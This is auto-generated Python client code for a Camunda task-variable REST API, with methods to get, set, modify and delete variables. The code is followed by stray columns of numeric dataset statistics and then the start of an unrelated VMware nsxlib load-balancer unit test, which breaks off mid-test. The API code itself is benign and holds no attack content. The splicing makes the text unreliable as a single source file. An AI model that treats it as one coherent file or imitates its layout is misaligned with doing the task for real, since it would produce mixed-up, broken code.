:param str var_name: The name of the variable to be removed. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'var_name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_task_variable" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delete_task_variable`") # noqa: E501
# verify the required parameter 'var_name' is set
if self.api_client.client_side_validation and ('var_name' not in local_var_params or # noqa: E501
local_var_params['var_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `var_name` when calling `delete_task_variable`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'var_name' in local_var_params:
path_params['varName'] = local_var_params['var_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/variables/{varName}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_task_variable(self, id, var_name, **kwargs): # noqa: E501
"""get_task_variable # noqa: E501
Retrieves a variable from the context of a given task. The variable must be visible from the task. It is visible from the task if it is a local task variable or declared in a parent scope of the task. See documentation on [visiblity of variables](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables/). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task_variable(id, var_name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the variable from. (required)
:param str var_name: The name of the variable to get. (required)
:param bool deserialize_value: Determines whether serializable variable values (typically variables that store custom Java objects) should be deserialized on the server side (default `true`). If set to `true`, a serializable variable will be deserialized on server side and transformed to JSON using [Jackson's](https://github.com/FasterXML/jackson) POJO/bean property introspection feature. Note that this requires the Java classes of the variable value to be on the REST API's classpath. If set to `false`, a serializable variable will be returned in its serialized format. For example, a variable that is serialized as XML will be returned as a JSON string containing XML. Note: While `true` is the default value for reasons of backward compatibility, we recommend setting this parameter to `false` when developing web applications that are independent of the Java process applications deployed to the engine.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: VariableValueDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_task_variable_with_http_info(id, var_name, **kwargs) # noqa: E501
def get_task_variable_with_http_info(self, id, var_name, **kwargs): # noqa: E501
"""get_task_variable # noqa: E501
Retrieves a variable from the context of a given task. The variable must be visible from the task. It is visible from the task if it is a local task variable or declared in a parent scope of the task. See documentation on [visiblity of variables](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables/). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task_variable_with_http_info(id, var_name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the variable from. (required)
:param str var_name: The name of the variable to get. (required)
:param bool deserialize_value: Determines whether serializable variable values (typically variables that store custom Java objects) should be deserialized on the server side (default `true`). If set to `true`, a serializable variable will be deserialized on server side and transformed to JSON using [Jackson's](https://github.com/FasterXML/jackson) POJO/bean property introspection feature. Note that this requires the Java classes of the variable value to be on the REST API's classpath. If set to `false`, a serializable variable will be returned in its serialized format. For example, a variable that is serialized as XML will be returned as a JSON string containing XML. Note: While `true` is the default value for reasons of backward compatibility, we recommend setting this parameter to `false` when developing web applications that are independent of the Java process applications deployed to the engine.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(VariableValueDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'var_name',
'deserialize_value'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_task_variable" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_task_variable`") # noqa: E501
# verify the required parameter 'var_name' is set
if self.api_client.client_side_validation and ('var_name' not in local_var_params or # noqa: E501
local_var_params['var_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `var_name` when calling `get_task_variable`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'var_name' in local_var_params:
path_params['varName'] = local_var_params['var_name'] # noqa: E501
query_params = []
if 'deserialize_value' in local_var_params and local_var_params['deserialize_value'] is not None: # noqa: E501
query_params.append(('deserializeValue', local_var_params['deserialize_value'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/variables/{varName}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VariableValueDto', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_task_variable_binary(self, id, var_name, **kwargs): # noqa: E501
"""get_task_variable_binary # noqa: E501
Retrieves a binary variable from the context of a given task. Applicable for byte array and file variables. The variable must be visible from the task. It is visible from the task if it is a local task variable or declared in a parent scope of the task. See documentation on [visiblity of variables](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables/). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task_variable_binary(id, var_name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the variable for. (required)
:param str var_name: The name of the variable to retrieve. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: file
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_task_variable_binary_with_http_info(id, var_name, **kwargs) # noqa: E501
def get_task_variable_binary_with_http_info(self, id, var_name, **kwargs): # noqa: E501
"""get_task_variable_binary # noqa: E501
Retrieves a binary variable from the context of a given task. Applicable for byte array and file variables. The variable must be visible from the task. It is visible from the task if it is a local task variable or declared in a parent scope of the task. See documentation on [visiblity of variables](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables/). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task_variable_binary_with_http_info(id, var_name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the variable for. (required)
:param str var_name: The name of the variable to retrieve. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(file, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'var_name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_task_variable_binary" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_task_variable_binary`") # noqa: E501
# verify the required parameter 'var_name' is set
if self.api_client.client_side_validation and ('var_name' not in local_var_params or # noqa: E501
local_var_params['var_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `var_name` when calling `get_task_variable_binary`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'var_name' in local_var_params:
path_params['varName'] = local_var_params['var_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/octet-stream', 'text/plain', 'application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/variables/{varName}/data', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_task_variables(self, id, **kwargs): # noqa: E501
"""get_task_variables # noqa: E501
Retrieves all variables visible from the task. A variable is visible from the task if it is a local task variable or declared in a parent scope of the task. See documentation on [visiblity of variables](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables/). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task_variables(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the variables from. (required)
:param bool deserialize_value: Determines whether serializable variable values (typically variables that store custom Java objects) should be deserialized on the server side (default `true`). If set to `true`, a serializable variable will be deserialized on server side and transformed to JSON using [Jackson's](https://github.com/FasterXML/jackson) POJO/bean property introspection feature. Note that this requires the Java classes of the variable value to be on the REST API's classpath. If set to `false`, a serializable variable will be returned in its serialized format. For example, a variable that is serialized as XML will be returned as a JSON string containing XML. Note: While `true` is the default value for reasons of backward compatibility, we recommend setting this parameter to `false` when developing web applications that are independent of the Java process applications deployed to the engine.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: dict(str, VariableValueDto)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_task_variables_with_http_info(id, **kwargs) # noqa: E501
def get_task_variables_with_http_info(self, id, **kwargs): # noqa: E501
"""get_task_variables # noqa: E501
Retrieves all variables visible from the task. A variable is visible from the task if it is a local task variable or declared in a parent scope of the task. See documentation on [visiblity of variables](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables/). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task_variables_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the variables from. (required)
:param bool deserialize_value: Determines whether serializable variable values (typically variables that store custom Java objects) should be deserialized on the server side (default `true`). If set to `true`, a serializable variable will be deserialized on server side and transformed to JSON using [Jackson's](https://github.com/FasterXML/jackson) POJO/bean property introspection feature. Note that this requires the Java classes of the variable value to be on the REST API's classpath. If set to `false`, a serializable variable will be returned in its serialized format. For example, a variable that is serialized as XML will be returned as a JSON string containing XML. Note: While `true` is the default value for reasons of backward compatibility, we recommend setting this parameter to `false` when developing web applications that are independent of the Java process applications deployed to the engine.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(dict(str, VariableValueDto), status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'deserialize_value'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_task_variables" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_task_variables`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'deserialize_value' in local_var_params and local_var_params['deserialize_value'] is not None: # noqa: E501
query_params.append(('deserializeValue', local_var_params['deserialize_value'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/variables', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, VariableValueDto)', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def modify_task_variables(self, id, **kwargs): # noqa: E501
"""modify_task_variables # noqa: E501
Updates or deletes the variables visible from the task. Updates precede deletions. So, if a variable is updated AND deleted, the deletion overrides the update. A variable is visible from the task if it is a local task variable or declared in a parent scope of the task. See documentation on [visiblity of variables](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables/). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_task_variables(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to set variables for. (required)
:param PatchVariablesDto patch_variables_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.modify_task_variables_with_http_info(id, **kwargs) # noqa: E501
def modify_task_variables_with_http_info(self, id, **kwargs): # noqa: E501
"""modify_task_variables # noqa: E501
Updates or deletes the variables visible from the task. Updates precede deletions. So, if a variable is updated AND deleted, the deletion overrides the update. A variable is visible from the task if it is a local task variable or declared in a parent scope of the task. See documentation on [visiblity of variables](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables/). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_task_variables_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to set variables for. (required)
:param PatchVariablesDto patch_variables_dto:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'patch_variables_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method modify_task_variables" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `modify_task_variables`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'patch_variables_dto' in local_var_params:
body_params = local_var_params['patch_variables_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/variables', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def put_task_variable(self, id, var_name, **kwargs): # noqa: E501
"""put_task_variable # noqa: E501
Updates a process variable that is visible from the Task scope. A variable is visible from the task if it is a local task variable, or declared in a parent scope of the task. See the documentation on [variable scopes and visibility](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables#variable-scopes-and-variable-visibility). **Note**: If a variable doesn't exist, the variable is created in the top-most scope visible from the task. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_task_variable(id, var_name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to set the variable for. (required)
:param str var_name: The name of the variable to set. (required)
:param VariableValueDto variable_value_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.put_task_variable_with_http_info(id, var_name, **kwargs) # noqa: E501
def put_task_variable_with_http_info(self, id, var_name, **kwargs): # noqa: E501
"""put_task_variable # noqa: E501
Updates a process variable that is visible from the Task scope. A variable is visible from the task if it is a local task variable, or declared in a parent scope of the task. See the documentation on [variable scopes and visibility](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables#variable-scopes-and-variable-visibility). **Note**: If a variable doesn't exist, the variable is created in the top-most scope visible from the task. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_task_variable_with_http_info(id, var_name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to set the variable for. (required)
:param str var_name: The name of the variable to set. (required)
:param VariableValueDto variable_value_dto:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'var_name',
'variable_value_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method put_task_variable" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `put_task_variable`") # noqa: E501
# verify the required parameter 'var_name' is set
if self.api_client.client_side_validation and ('var_name' not in local_var_params or # noqa: E501
local_var_params['var_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `var_name` when calling `put_task_variable`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'var_name' in local_var_params:
path_params['varName'] = local_var_params['var_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'variable_value_dto' in local_var_params:
body_params = local_var_params['variable_value_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/variables/{varName}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def set_binary_task_variable(self, id, var_name, **kwargs): # noqa: E501
"""set_binary_task_variable # noqa: E501
Sets the serialized value for a binary variable or the binary value for a file variable visible from the task. A variable is visible from the task if it is a local task variable or declared in a parent scope of the task. See documentation on [visiblity of variables](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables/). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_binary_task_variable(id, var_name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the variable for. (required)
:param str var_name: The name of the variable to retrieve. (required)
:param file data: The binary data to be set. For File variables, this multipart can contain the filename, binary value and MIME type of the file variable to be set Only the filename is mandatory.
:param str value_type: The name of the variable type. Either Bytes for a byte array variable or File for a file variable.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.set_binary_task_variable_with_http_info(id, var_name, **kwargs) # noqa: E501
def set_binary_task_variable_with_http_info(self, id, var_name, **kwargs): # noqa: E501
"""set_binary_task_variable # noqa: E501
Sets the serialized value for a binary variable or the binary value for a file variable visible from the task. A variable is visible from the task if it is a local task variable or declared in a parent scope of the task. See documentation on [visiblity of variables](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables/). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_binary_task_variable_with_http_info(id, var_name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the variable for. (required)
:param str var_name: The name of the variable to retrieve. (required)
:param file data: The binary data to be set. For File variables, this multipart can contain the filename, binary value and MIME type of the file variable to be set Only the filename is mandatory.
:param str value_type: The name of the variable type. Either Bytes for a byte array variable or File for a file variable.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'var_name',
'data',
'value_type'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method set_binary_task_variable" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `set_binary_task_variable`") # noqa: E501
# verify the required parameter 'var_name' is set
if self.api_client.client_side_validation and ('var_name' not in local_var_params or # noqa: E501
local_var_params['var_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `var_name` when calling `set_binary_task_variable`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'var_name' in local_var_params:
path_params['varName'] = local_var_params['var_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'data' in local_var_params:
local_var_files['data'] = local_var_params['data'] # noqa: E501
if 'value_type' in local_var_params:
form_params.append(('valueType', local_var_params['value_type'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/variables/{varName}/data', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 54.310943
| 923
| 0.624269
| 6,180
| 50,129
| 4.867638
| 0.046926
| 0.0367
| 0.054917
| 0.020943
| 0.969749
| 0.969051
| 0.968453
| 0.966425
| 0.965428
| 0.963932
| 0
| 0.013856
| 0.304614
| 50,129
| 922
| 924
| 54.369848
| 0.849106
| 0.534102
| 0
| 0.748315
| 1
| 0
| 0.177877
| 0.042629
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033708
| false
| 0
| 0.011236
| 0
| 0.078652
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fbb680616f5e113ad0cf9e3983e44ae261650b7a
| 85,381
|
py
|
Python
|
vmware_nsxlib/tests/unit/v3/policy/test_lb_resources.py
|
salv-orlando/vmware-nsxlib
|
283eff2881b99c57b3908d03fb1c91da7dbdf46e
|
[
"Apache-2.0"
] | null | null | null |
vmware_nsxlib/tests/unit/v3/policy/test_lb_resources.py
|
salv-orlando/vmware-nsxlib
|
283eff2881b99c57b3908d03fb1c91da7dbdf46e
|
[
"Apache-2.0"
] | null | null | null |
vmware_nsxlib/tests/unit/v3/policy/test_lb_resources.py
|
salv-orlando/vmware-nsxlib
|
283eff2881b99c57b3908d03fb1c91da7dbdf46e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 VMware, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import copy
from unittest import mock
from vmware_nsxlib.tests.unit.v3 import nsxlib_testcase
from vmware_nsxlib.tests.unit.v3.policy import test_resources
from vmware_nsxlib.v3 import exceptions as nsxlib_exc
from vmware_nsxlib.v3 import nsx_constants
from vmware_nsxlib.v3.policy import constants
from vmware_nsxlib.v3.policy import lb_defs
TEST_TENANT = 'test'
class TestPolicyLBClientSSLProfileApi(test_resources.NsxPolicyLibTestCase):
def setUp(self, *args, **kwargs):
super(TestPolicyLBClientSSLProfileApi, self).setUp()
self.resourceApi = self.policy_lib.load_balancer.client_ssl_profile
def test_create_with_id(self):
name = 'd1'
description = 'desc'
obj_id = '111'
protocols = ['TLS_V1_1']
with mock.patch.object(self.policy_api,
"create_or_update") as api_call:
result = self.resourceApi.create_or_overwrite(
name,
client_ssl_profile_id=obj_id,
description=description,
protocols=protocols,
tenant=TEST_TENANT)
expected_def = lb_defs.LBClientSslProfileDef(
client_ssl_profile_id=obj_id,
name=name,
description=description,
protocols=protocols,
tenant=TEST_TENANT)
